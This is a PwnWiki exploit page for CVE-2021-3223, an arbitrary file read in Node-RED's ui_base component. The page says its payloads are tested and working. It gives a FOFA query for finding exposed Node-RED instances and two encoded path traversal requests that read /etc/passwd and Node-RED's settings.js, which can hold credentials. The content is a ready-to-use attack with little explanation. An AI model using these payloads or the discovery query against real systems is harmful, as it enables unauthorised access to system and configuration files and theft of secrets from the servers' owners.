CVE-2021-3223 Node-RED ui base 任意文件讀取漏洞

From PwnWiki
Revision as of 17:19, 4 July 2021 by Pwnwiki (talk | contribs) (Created page with "<languages /> <center> {| style="border: 2.0px solid grey; background: #b3ff9c;" width="85%" | align="center" width="60px"| link=|55px | align="center" |'...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎English • ‎中文(中国大陆)‎


Check.png 該漏洞已通過驗證

本頁面的EXP/POC/Payload經測試可用,漏洞已經成功復現。

漏洞影響

Node-RED

FOFA

title="Node-RED"

POC

/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ui_base/js/..%2f..%2f..%2f..%2fsettings.js

參考

https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-3223_Node-RED_ui_base_任意文件讀取漏洞&oldid=6251"